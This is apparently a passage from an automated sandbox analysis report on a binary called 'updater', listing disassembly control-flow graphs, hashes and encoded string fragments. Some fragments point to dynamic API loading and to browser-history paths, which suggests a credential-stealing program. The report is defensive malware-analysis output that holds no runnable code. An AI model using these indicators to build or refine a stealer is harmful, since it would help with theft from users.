                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveModule$ConditionCounterDeallocateFileHandleNamePerformanceQueryVariableWake
                                  • String ID: sec.$(\;$)$.$.$@traffer$hGBK$kmz{$mO\J$mac~{zk|`ock.$tMO]$|k$}ZKO$~
                                  • API String ID: 3852128730-870685121
                                  • Opcode ID: a0eacb1838da82b5f0432b927599f491542904100ca8e2c841c2ee4940c375f9
                                  • Instruction ID: 4f6addb6bf1fc3a32f8cf2334d6cc8a2f7c8bfcbdd6d45e7afb9e25faa641db5
                                  • Opcode Fuzzy Hash: a0eacb1838da82b5f0432b927599f491542904100ca8e2c841c2ee4940c375f9
                                  • Instruction Fuzzy Hash: D3230571D0429A8EDF15EBB8E844BDDBBB4AF61208F2440DED0496B1A1DB745F88CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1974 13cb653-13cb6a6 call 1440cfc 1977 13cb6dd-13cb6e3 1974->1977 1978 13cb6a8-13cb6bb call 141db91 1974->1978 1979 13cb6f4-13cb73b call 13de8c7 1977->1979 1980 13cb6e5 1977->1980 1978->1977 1985 13cb6bd-13cb6dc call 13dd272 call 141dfe8 call 141db47 1978->1985 1988 13cb73d-13cb750 call 141db91 1979->1988 1989 13cb772-13cb779 1979->1989 1982 13cb6e7-13cb6f2 1980->1982 1982->1979 1982->1982 1985->1977 1988->1989 1998 13cb752-13cb771 call 13dd62a call 141dfe8 call 141db47 1988->1998 1991 13cb78a-13cb7fc call 13de8c7 call 13dfec9 call 13c3174 call 13ddd77 1989->1991 1992 13cb77b 1989->1992 2015 13cb7fe-13cb82a call 13de0ab call 13c8e25 1991->2015 2016 13cb844-13cb87f call 13dfec9 call 13c3174 call 13ddd77 1991->2016 1995 13cb77d-13cb788 1992->1995 1995->1991 1995->1995 1998->1989 2026 13cb82c-13cb834 call 13de143 2015->2026 2027 13cb839-13cb83f call 13ddf41 2015->2027 2031 13cb881-13cb8c0 call 13de0ab call 13c8e25 call 13dd9e5 call 13ddf41 2016->2031 2032 13cb8c2 2016->2032 2026->2027 2027->2016 2034 13cb8c4-13cb8d3 call 13dea7d 2031->2034 2032->2034 2039 13cc1cc-13cc1e2 call 13dea7d 2034->2039 2040 13cb8d9-13cb8f9 2034->2040 2054 13cc1e8-13cc338 call 13c8f5d * 2 call 13de8c7 call 13dfa3b call 13de917 call 13dfa3b call 13ddf41 * 5 call 13de0ab * 2 call 13c8dc6 call 13cc490 call 13dd2ae 2039->2054 2055 13cc452-13cc489 call 13ddf41 * 4 2039->2055 2042 13cb8fb-13cb90d call 141db91 2040->2042 2043 13cb935-13cb93c 2040->2043 2042->2043 2057 13cb90f-13cb934 call 141dfe8 call 141db47 2042->2057 2048 13cb94d-13cb95e call 13dd960 2043->2048 2049 13cb93e 2043->2049 2048->2039 2065 13cb964-13cb983 2048->2065 2053 13cb940-13cb94b 2049->2053 2053->2048 2053->2053 2172 13cc378-13cc37f 2054->2172 2173 13cc33a-13cc34c call 141db91 2054->2173 2057->2043 2066 13cb985-13cb997 call 141db91 2065->2066 2067 13cb9c2-13cb9c9 2065->2067 2066->2067 2084 13cb999-13cb9c1 call 141dfe8 call 141db47 2066->2084 2075 13cb9da-13cba17 call 13dd960 call 13ddfa2 call 13dda01 2067->2075 2076 13cb9cb 2067->2076 2101 13cba19-13cba2c call 141db91 2075->2101 2102 13cba51-13cba58 2075->2102 2081 13cb9cd-13cb9d8 2076->2081 2081->2075 2081->2081 2084->2067 2101->2102 2112 13cba2e-13cba50 call 141dfe8 call 141db47 2101->2112 2106 13cba69-13cbab6 call 13dd960 call 13dd8d6 2102->2106 2107 13cba5a 2102->2107 2121 13cbaf8-13cbaff 2106->2121 2122 13cbab8-13cbaca call 141db91 2106->2122 2110 13cba5c-13cba67 2107->2110 2110->2106 2110->2110 2112->2102 2127 13cbb10-13cbb93 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2121->2127 2128 13cbb01 2121->2128 2136 13cbacc-13cbaf4 call 141dfe8 call 141db47 2122->2136 2137 13cbaf5 2122->2137 2162 13cbb95-13cbba7 call 141db91 2127->2162 2163 13cbbd2-13cbbd9 2127->2163 2131 13cbb03-13cbb0e 2128->2131 2131->2127 2131->2131 2136->2137 2137->2121 2162->2163 2177 13cbba9-13cbbd1 call 141dfe8 call 141db47 2162->2177 2165 13cbbea-13cbc27 call 13dd960 call 13ddfa2 call 13dda01 2163->2165 2166 13cbbdb 2163->2166 2198 13cbc29-13cbc3c call 141db91 2165->2198 2199 13cbc61-13cbc68 2165->2199 2169 13cbbdd-13cbbe8 2166->2169 2169->2165 2169->2169 2174 13cc390-13cc400 call 13ddfe8 call 13de917 call 13de981 call 13de917 2172->2174 2175 13cc381 2172->2175 2173->2172 2185 13cc34e-13cc377 call 141dfe8 call 141db47 2173->2185 2212 13cc404-13cc44d call 13c83df call 13ddf41 * 5 2174->2212 2213 13cc402 2174->2213 2179 13cc383-13cc38e 2175->2179 2177->2163 2179->2174 2179->2179 2185->2172 2198->2199 2210 13cbc3e-13cbc60 call 141dfe8 call 141db47 2198->2210 2201 13cbc79-13cbcc6 call 13dd960 call 13dd8d6 2199->2201 2202 13cbc6a 2199->2202 2221 13cbd08-13cbd0f 2201->2221 2222 13cbcc8-13cbcda call 141db91 2201->2222 2205 13cbc6c-13cbc77 2202->2205 2205->2201 2205->2205 2210->2199 2212->2055 2213->2212 2225 13cbd20-13cbda3 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2221->2225 2226 13cbd11 2221->2226 2232 13cbcdc-13cbd04 call 141dfe8 call 141db47 2222->2232 2233 13cbd05 2222->2233 2256 13cbda5-13cbdb7 call 141db91 2225->2256 2257 13cbde2-13cbde9 2225->2257 2229 13cbd13-13cbd1e 2226->2229 2229->2225 2229->2229 2232->2233 2233->2221 2256->2257 2265 13cbdb9-13cbde1 call 141dfe8 call 141db47 2256->2265 2259 13cbdfa-13cbe37 call 13dd960 call 13ddfa2 call 13dda01 2257->2259 2260 13cbdeb 2257->2260 2274 13cbe39-13cbe4c call 141db91 2259->2274 2275 13cbe71-13cbe78 2259->2275 2261 13cbded-13cbdf8 2260->2261 2261->2259 2261->2261 2265->2257 2274->2275 2283 13cbe4e-13cbe70 call 141dfe8 call 141db47 2274->2283 2276 13cbe89-13cbed6 call 13dd960 call 13dd8d6 2275->2276 2277 13cbe7a 2275->2277 2288 13cbf18-13cbf1f 2276->2288 2289 13cbed8-13cbeea call 141db91 2276->2289 2279 13cbe7c-13cbe87 2277->2279 2279->2276 2279->2279 2283->2275 2291 13cbf30-13cbfb6 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2288->2291 2292 13cbf21 2288->2292 2299 13cbeec-13cbf14 call 141dfe8 call 141db47 2289->2299 2300 13cbf15 2289->2300 2315 13cbfed-13cbff4 2291->2315 2316 13cbfb8-13cbfcb call 141db91 2291->2316 2295 13cbf23-13cbf2e 2292->2295 2295->2291 2295->2295 2299->2300 2300->2288 2318 13cc005-13cc042 call 13dd960 call 13ddfa2 call 13dda01 2315->2318 2319 13cbff6 2315->2319 2316->2315 2324 13cbfcd-13cbfec call 13dd589 call 141dfe8 call 141db47 2316->2324 2333 13cc07c-13cc083 2318->2333 2334 13cc044-13cc057 call 141db91 2318->2334 2321 13cbff8-13cc003 2319->2321 2321->2318 2321->2321 2324->2315 2338 13cc094-13cc0f2 call 13dd960 call 13dd8d6 call 13c8fd9 2333->2338 2339 13cc085 2333->2339 2334->2333 2344 13cc059-13cc07b call 141dfe8 call 141db47 2334->2344 2353 13cc134-13cc13b 2338->2353 2354 13cc0f4-13cc106 call 141db91 2338->2354 2342 13cc087-13cc092 2339->2342 2342->2338 2342->2342 2344->2333 2355 13cc14c-13cc1b8 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 4 2353->2355 2356 13cc13d 2353->2356 2362 13cc108-13cc130 call 141dfe8 call 141db47 2354->2362 2363 13cc131 2354->2363 2355->2039 2355->2040 2358 13cc13f-13cc14a 2356->2358 2358->2355 2358->2358 2362->2363 2363->2353
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                  • String ID: &$(\;$.$.$.$.$.$.$.$.$.$.$.$CB$LO]K$O@OI$fA]Z$hGBKtGBBOr${]K\$~A\Z$~O]]
                                  • API String ID: 1208101283-339470192
                                  • Opcode ID: c873604f8258ecc0854e41bde1d149fba5cadf55e275cb3d86994cc7c597202c
                                  • Instruction ID: 2940fb0337f2d691125cff2c933c6a5297448fced68c27b4820fd1cd32ba8a29
                                  • Opcode Fuzzy Hash: c873604f8258ecc0854e41bde1d149fba5cadf55e275cb3d86994cc7c597202c
                                  • Instruction Fuzzy Hash: B7822671D04289DFDB25EBB8D949BDDBBB4AF21318F20419ED0456B2A5DB701E88CF12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2380 13d1bd6-13d1c1a call 1440cfc 2383 13d1c1c-13d1c2f call 141db91 2380->2383 2384 13d1c51-13d1c57 2380->2384 2383->2384 2392 13d1c31-13d1c50 call 13dd1a9 call 141dfe8 call 141db47 2383->2392 2386 13d1c59 2384->2386 2387 13d1c68-13d1ccd call 13de8c7 call 13dfec9 call 13c3174 2384->2387 2389 13d1c5b-13d1c66 2386->2389 2399 13d1cd2-13d1ce2 call 13ddd77 2387->2399 2389->2387 2389->2389 2392->2384 2405 13d1ce8-13d1d17 call 13de0ab call 13c8e25 2399->2405 2406 13d2446 2399->2406 2417 13d1d19-13d1d20 call 13de143 2405->2417 2418 13d1d25-13d1d42 call 13ddf41 call 13dea7d 2405->2418 2407 13d2448-13d245e call 13dea7d 2406->2407 2413 13d26cf-13d26fe call 13ddf41 * 3 2407->2413 2414 13d2464-13d259f call 13c8f5d * 2 call 13de8c7 call 13dfa3b call 13de917 call 13dfa3b call 13ddf41 * 5 call 13de0ab * 2 call 13c8dc6 2407->2414 2516 13d25da-13d25e1 2414->2516 2517 13d25a1-13d25b3 call 141db91 2414->2517 2417->2418 2418->2407 2434 13d1d48-13d1d74 2418->2434 2437 13d1d76-13d1d88 call 141db91 2434->2437 2438 13d1db1-13d1db8 2434->2438 2437->2438 2449 13d1d8a-13d1db0 call 141dfe8 call 141db47 2437->2449 2441 13d1dc9-13d1ddd call 13dd960 2438->2441 2442 13d1dba 2438->2442 2441->2407 2450 13d1de3-13d1e06 2441->2450 2446 13d1dbc-13d1dc7 2442->2446 2446->2441 2446->2446 2449->2438 2453 13d1e08-13d1e1a call 141db91 2450->2453 2454 13d1e43-13d1e4a 2450->2454 2453->2454 2468 13d1e1c-13d1e42 call 141dfe8 call 141db47 2453->2468 2460 13d1e4c 2454->2460 2461 13d1e5b-13d1eb1 call 13dd960 call 13ddfa2 call 13dda01 2454->2461 2466 13d1e4e-13d1e59 2460->2466 2482 13d1eef-13d1ef6 2461->2482 2483 13d1eb3-13d1ec5 call 141db91 2461->2483 2466->2461 2466->2466 2468->2454 2487 13d1ef8 2482->2487 2488 13d1f07-13d1f58 call 13dd960 call 13dd8d6 2482->2488 2483->2482 2495 13d1ec7-13d1eee call 141dfe8 call 141db47 2483->2495 2489 13d1efa-13d1f05 2487->2489 2503 13d1f98-13d1f9f 2488->2503 2504 13d1f5a-13d1f6c call 141db91 2488->2504 2489->2488 2489->2489 2495->2482 2506 13d1fa1 2503->2506 2507 13d1fb0-13d202a call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2503->2507 2518 13d1f6e-13d1f94 call 141dfe8 call 141db47 2504->2518 2519 13d1f95 2504->2519 2511 13d1fa3-13d1fae 2506->2511 2566 13d202c-13d203e call 141db91 2507->2566 2567 13d2066-13d206d 2507->2567 2511->2507 2511->2511 2520 13d25e3 2516->2520 2521 13d25f2-13d260b 2516->2521 2517->2516 2533 13d25b5-13d25d9 call 13dd54d call 141dfe8 call 141db47 2517->2533 2518->2519 2519->2503 2525 13d25e5-13d25f0 2520->2525 2526 13d260d-13d2620 call 141db91 2521->2526 2527 13d2645-13d264c 2521->2527 2525->2521 2525->2525 2526->2527 2543 13d2622-13d2644 call 141dfe8 call 141db47 2526->2543 2535 13d264e-13d2659 2527->2535 2536 13d265b-13d2690 call 13de9ec call 13de917 2527->2536 2533->2516 2535->2535 2535->2536 2554 13d2694-13d26ca call 13c83df call 13ddf41 * 3 2536->2554 2555 13d2692 2536->2555 2543->2527 2554->2413 2555->2554 2566->2567 2576 13d2040-13d2065 call 141dfe8 call 141db47 2566->2576 2570 13d206f 2567->2570 2571 13d207e-13d20c4 call 13dd960 call 13ddfa2 call 13dda01 2567->2571 2574 13d2071-13d207c 2570->2574 2588 13d20c6-13d20d8 call 141db91 2571->2588 2589 13d2102-13d2109 2571->2589 2574->2571 2574->2574 2576->2567 2588->2589 2596 13d20da-13d2101 call 141dfe8 call 141db47 2588->2596 2591 13d210b 2589->2591 2592 13d211a-13d2164 call 13dd960 call 13dd8d6 2589->2592 2594 13d210d-13d2118 2591->2594 2602 13d2166-13d2178 call 141db91 2592->2602 2603 13d21a3-13d21aa 2592->2603 2594->2592 2594->2594 2596->2589 2612 13d217a-13d219f call 141dfe8 call 141db47 2602->2612 2613 13d21a0 2602->2613 2607 13d21ac 2603->2607 2608 13d21bb-13d223c call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2603->2608 2610 13d21ae-13d21b9 2607->2610 2629 13d223e-13d2250 call 141db91 2608->2629 2630 13d2279-13d2280 2608->2630 2610->2608 2610->2610 2612->2613 2613->2603 2629->2630 2638 13d2252-13d2278 call 141dfe8 call 141db47 2629->2638 2631 13d2291-13d22de call 13dd960 call 13ddfa2 call 13dda01 2630->2631 2632 13d2282 2630->2632 2647 13d2319-13d2320 2631->2647 2648 13d22e0-13d22f2 call 141db91 2631->2648 2634 13d2284-13d228f 2632->2634 2634->2631 2634->2634 2638->2630 2649 13d2331-13d237b call 13dd960 call 13dd8d6 2647->2649 2650 13d2322 2647->2650 2648->2647 2656 13d22f4-13d2318 call 141dfe8 call 141db47 2648->2656 2662 13d237d-13d238f call 141db91 2649->2662 2663 13d23b7-13d23be 2649->2663 2652 13d2324-13d232f 2650->2652 2652->2649 2652->2652 2656->2647 2672 13d23b4 2662->2672 2673 13d2391-13d23b3 call 141dfe8 call 141db47 2662->2673 2665 13d23cf-13d2441 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2663->2665 2666 13d23c0 2663->2666 2665->2434 2668 13d23c2-13d23cd 2666->2668 2668->2665 2668->2668 2672->2663 2673->2672
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                  • String ID: (\;$.$.$.$.$.$.$.$.$AMAB$AZAM$B.$ZAMA$ZAMA$]YA\$]]YA$`OCK$dOLLK\r.$~O]]$~\AZ
                                  • API String ID: 2013694253-1575873031
                                  • Opcode ID: 5c05c0f5ac3690b8a1747788527b64071056abf583f18ebf64d5de2a853b4d8a
                                  • Instruction ID: 103ae6b30eae783fcb19a3319999f3701efaa9b33c3f6b5c69ce65c38ed2c739
                                  • Opcode Fuzzy Hash: 5c05c0f5ac3690b8a1747788527b64071056abf583f18ebf64d5de2a853b4d8a
                                  • Instruction Fuzzy Hash: E4520672D04289DFDB25EFA8E848BDDBB75BF2131CF14419DD0496B2A1DB701A89CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2689 13d3095-13d30c6 call 1440cfc call 13dea7d 2694 13d32ec 2689->2694 2695 13d30cc-13d311a call 13d3dfb call 13dd2ae call 13dda74 2689->2695 2697 13d32f3-13d331f 2694->2697 2716 13d311c-13d312e call 141db91 2695->2716 2717 13d3155-13d315c 2695->2717 2699 13d3356-13d335d 2697->2699 2700 13d3321-13d3334 call 141db91 2697->2700 2702 13d335f 2699->2702 2703 13d336e-13d33b9 call 13de8c7 call 13dfec9 call 13c3174 call 13ddd77 2699->2703 2700->2699 2710 13d3336-13d3355 call 13dd0b8 call 141dfe8 call 141db47 2700->2710 2706 13d3361-13d336c 2702->2706 2738 13d33bf-13d33dc call 13de0ab call 13d2c33 2703->2738 2739 13d3dea 2703->2739 2706->2703 2706->2706 2710->2699 2716->2717 2731 13d3130-13d3154 call 13dd132 call 141dfe8 call 141db47 2716->2731 2722 13d316d-13d31a2 call 13dda74 call 13dbb72 call 13dea7d 2717->2722 2723 13d315e 2717->2723 2747 13d31a8-13d31f1 call 13ddfe8 2722->2747 2748 13d32da 2722->2748 2728 13d3160-13d316b 2723->2728 2728->2722 2728->2728 2731->2717 2738->2739 2756 13d33e2-13d348d call 13dfec9 call 13c2e70 call 13ddd77 call 13ca25a * 2 2738->2756 2758 13d3228-13d322f 2747->2758 2759 13d31f3-13d3206 call 141db91 2747->2759 2753 13d32df-13d32ea call 13ddf41 2748->2753 2753->2697 2794 13d348f call 13c16cb 2756->2794 2795 13d3494 2756->2795 2762 13d3231 2758->2762 2763 13d3240-13d3289 call 13de9ec call 13de917 call 13dbb72 2758->2763 2759->2758 2771 13d3208-13d3227 call 13dd0f5 call 141dfe8 call 141db47 2759->2771 2766 13d3233-13d323e 2762->2766 2787 13d3299-13d32c1 call 13ddf41 * 2 call 13dea7d 2763->2787 2788 13d328b-13d3294 call 13de143 2763->2788 2766->2763 2766->2766 2771->2758 2787->2753 2813 13d32c3-13d32d9 call 13ddf41 2787->2813 2788->2787 2794->2795 2798 13d3498-13d349a 2795->2798 2800 13d3dc5-13d3dc7 2798->2800 2801 13d34a0-13d34a9 call 13c2a7c 2798->2801 2802 13d3dc9-13d3dcb call 13c16cb 2800->2802 2803 13d3dd0-13d3dd8 2800->2803 2814 13d34af-13d34ee call 13de5d4 call 13ddf41 2801->2814 2815 13d3da9-13d3daf call 13c2ebb 2801->2815 2802->2803 2807 13d3ddf-13d3de5 call 13ddf41 2803->2807 2808 13d3dda call 13c16cb 2803->2808 2807->2739 2808->2807 2814->2815 2825 13d34f4-13d35bf call 13de5d4 call 13dfec9 call 13c2e70 call 13ddd77 call 13ddf41 call 13ca25a * 2 2814->2825 2821 13d3db4-13d3dc0 2815->2821 2821->2798 2840 13d35c6 2825->2840 2841 13d35c1 call 13c16cb 2825->2841 2843 13d35ca-13d35cc 2840->2843 2841->2840 2844 13d3d8b-13d3d8d 2843->2844 2845 13d35d2-13d35db call 13c2a7c 2843->2845 2846 13d3d8f-13d3d91 call 13c16cb 2844->2846 2847 13d3d96-13d3da2 2844->2847 2852 13d3d6f-13d3d75 call 13c2ebb 2845->2852 2853 13d35e1-13d3612 2845->2853 2846->2847 2847->2815 2851 13d3da4 call 13c16cb 2847->2851 2851->2815 2860 13d3d7a-13d3d86 2852->2860 2856 13d3614-13d3626 call 141db91 2853->2856 2857 13d3650-13d3657 2853->2857 2856->2857 2866 13d3628-13d364f call 141dfe8 call 141db47 2856->2866 2858 13d3659 2857->2858 2859 13d3668-13d36bb call 13c23eb call 13de5d4 call 13dea7d call 13ddf41 call 13ddd77 2857->2859 2862 13d365b-13d3666 2858->2862 2859->2852 2879 13d36c1-13d36f2 call 13de5d4 call 13c8e25 2859->2879 2860->2843 2862->2859 2862->2862 2866->2857 2884 13d36f4-13d36fc call 13de143 2879->2884 2885 13d3701-13d3707 call 13ddf41 2879->2885 2884->2885 2888 13d370c-13d373c 2885->2888 2889 13d373e-13d3751 call 141db91 2888->2889 2890 13d3777-13d377e 2888->2890 2889->2890 2898 13d3753-13d3776 call 141dfe8 call 141db47 2889->2898 2891 13d378f-13d37a3 call 13dd960 2890->2891 2892 13d3780 2890->2892 2891->2852 2899 13d37a9-13d37de 2891->2899 2894 13d3782-13d378d 2892->2894 2894->2891 2894->2894 2898->2890 2901 13d3815-13d381c 2899->2901 2902 13d37e0-13d37f3 call 141db91 2899->2902 2905 13d382d-13d38ad call 13de9ec call 13de917 call 13dd9e5 call 13ddf41 * 2 2901->2905 2906 13d381e 2901->2906 2902->2901 2913 13d37f5-13d3814 call 13dd1e6 call 141dfe8 call 141db47 2902->2913 2928 13d38af-13d38c2 call 141db91 2905->2928 2929 13d38e8-13d38ef 2905->2929 2909 13d3820-13d382b 2906->2909 2909->2905 2909->2909 2913->2901 2928->2929 2936 13d38c4-13d38e7 call 141dfe8 call 141db47 2928->2936 2931 13d38f1 2929->2931 2932 13d3900-13d3977 call 13dd960 call 13ddfa2 call 13dda01 call 13dd960 call 13dd8d6 2929->2932 2934 13d38f3-13d38fe 2931->2934 2950 13d3979-13d398b call 141db91 2932->2950 2951 13d39b2-13d39b9 2932->2951 2934->2932 2934->2934 2936->2929 2950->2951 2959 13d398d-13d39b1 call 141dfe8 call 141db47 2950->2959 2952 13d39bb 2951->2952 2953 13d39ca-13d3a44 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 2951->2953 2955 13d39bd-13d39c8 2952->2955 2974 13d3a7b-13d3a82 2953->2974 2975 13d3a46-13d3a59 call 141db91 2953->2975 2955->2953 2955->2955 2959->2951 2977 13d3a84 2974->2977 2978 13d3a93-13d3b16 call 13dd960 call 13ddfa2 call 13dda01 call 13dd960 call 13dd8d6 call 13d2f89 2974->2978 2975->2974 2982 13d3a5b-13d3a7a call 13dd1a9 call 141dfe8 call 141db47 2975->2982 2980 13d3a86-13d3a91 2977->2980 3000 13d3b18-13d3b2a call 141db91 2978->3000 3001 13d3b52-13d3b59 2978->3001 2980->2978 2980->2980 2982->2974 3000->3001 3009 13d3b2c-13d3b51 call 141dfe8 call 141db47 3000->3009 3002 13d3b5b 3001->3002 3003 13d3b6a-13d3be7 call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 3001->3003 3005 13d3b5d-13d3b68 3002->3005 3024 13d3c1e-13d3c25 3003->3024 3025 13d3be9-13d3bfc call 141db91 3003->3025 3005->3003 3005->3005 3009->3001 3027 13d3c27 3024->3027 3028 13d3c36-13d3cb7 call 13dd960 call 13ddfa2 call 13dda01 call 13dd960 call 13dd8d6 call 13d2f89 3024->3028 3025->3024 3033 13d3bfe-13d3c1d call 13dd1a9 call 141dfe8 call 141db47 3025->3033 3030 13d3c29-13d3c34 3027->3030 3050 13d3cb9-13d3ccb call 141db91 3028->3050 3051 13d3cf2-13d3cf9 3028->3051 3030->3028 3030->3030 3033->3024 3050->3051 3059 13d3ccd-13d3cf1 call 141dfe8 call 141db47 3050->3059 3052 13d3cfb 3051->3052 3053 13d3d0a-13d3d6a call 13dea3d call 13de917 call 13dd9e5 call 13ddf41 * 3 3051->3053 3055 13d3cfd-13d3d08 3052->3055 3053->2888 3055->3053 3055->3055 3059->3051
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                  • String ID: !$.$.$.$.$.$BAIG@]$HGBK$Install Directory$Z@OC$Z@OC$[]K\$\Main$]|$].$]A@.$hAVs
                                  • API String ID: 1208101283-1360112660
                                  • Opcode ID: 82a12a0b5e116e89ab8b3d2118db5d8b534dd017388864de35e481d822f4c32e
                                  • Instruction ID: 7f2db351a03a4c287f6148cf35fe95c4de9e460274b38244a55af737a524638d
                                  • Opcode Fuzzy Hash: 82a12a0b5e116e89ab8b3d2118db5d8b534dd017388864de35e481d822f4c32e
                                  • Instruction Fuzzy Hash: 517237B2D002599BDF24EBB8E844BEDBB74BF21308F14419DD4496B2A1DF705E89CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                  • String ID: (\;$.$.$=$B.$B.$\history$\history\$dOLLK\r.$dOLLK\r.$rOMMA[@Z]$rOMMA[@Z]$r~}g$r~}g$r~}gr.$r~}gr.
                                  • API String ID: 4060657020-3929556054
                                  • Opcode ID: b738e67fffe2ae8eec5da1e00521dafb6a76833933325f82e21a3c30227a5f9c
                                  • Instruction ID: ec1f19454d30142f03447159c014872252038e69895502ca0dd7d8c97752d222
                                  • Opcode Fuzzy Hash: b738e67fffe2ae8eec5da1e00521dafb6a76833933325f82e21a3c30227a5f9c
                                  • Instruction Fuzzy Hash: 4FD28D71D0429ADEDF25EBA8E894BDDBB74AF25308F1040DDD4496B2A1DB701B88CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3659 13da518-13da528 3660 13da52e-13da55f 3659->3660 3661 13da8b0 3659->3661 3662 13da59b-13da5a1 3660->3662 3663 13da561-13da573 call 141db91 3660->3663 3664 13da8b2-13da8b6 3661->3664 3666 13da5a3 3662->3666 3667 13da5b2-13da5c7 LoadLibraryA 3662->3667 3663->3662 3673 13da575-13da59a call 141dfe8 call 141db47 3663->3673 3670 13da5a5-13da5b0 3666->3670 3667->3661 3668 13da5cd-13da5ea 3667->3668 3671 13da5ec-13da5ff call 141db91 3668->3671 3672 13da622-13da628 3668->3672 3670->3667 3670->3670 3684 13da61c 3671->3684 3685 13da601-13da61b call 13dcfde call 141dfe8 call 141db47 3671->3685 3676 13da639-13da66d GetProcAddress 3672->3676 3677 13da62a 3672->3677 3673->3662 3678 13da66f-13da681 call 141db91 3676->3678 3679 13da6a8-13da6ae 3676->3679 3682 13da62c-13da637 3677->3682 3678->3679 3696 13da683-13da6a7 call 13dd54d call 141dfe8 call 141db47 3678->3696 3687 13da6bf-13da6f0 GetProcAddress 3679->3687 3688 13da6b0 3679->3688 3682->3676 3682->3682 3684->3672 3685->3684 3693 13da732-13da738 3687->3693 3694 13da6f2-13da704 call 141db91 3687->3694 3692 13da6b2-13da6bd 3688->3692 3692->3687 3692->3692 3698 13da749-13da78b GetProcAddress call 13da8b7 call 13dd2ae GetProcAddress 3693->3698 3699 13da73a 3693->3699 3694->3693 3705 13da706-13da731 call 141dfe8 call 141db47 3694->3705 3696->3679 3719 13da78d-13da79f call 141db91 3698->3719 3720 13da7c6-13da802 call 13dd30d GetProcAddress 3698->3720 3703 13da73c-13da747 3699->3703 3703->3698 3703->3703 3705->3693 3719->3720 3727 13da7a1-13da7c5 call 13dd327 call 141dfe8 call 141db47 3719->3727 3728 13da804-13da816 call 141db91 3720->3728 3729 13da841-13da847 3720->3729 3727->3720 3728->3729 3740 13da818-13da840 call 141dfe8 call 141db47 3728->3740 3731 13da849-13da854 3729->3731 3732 13da856-13da86f GetProcAddress 3729->3732 3731->3731 3731->3732 3735 13da8a4-13da8aa 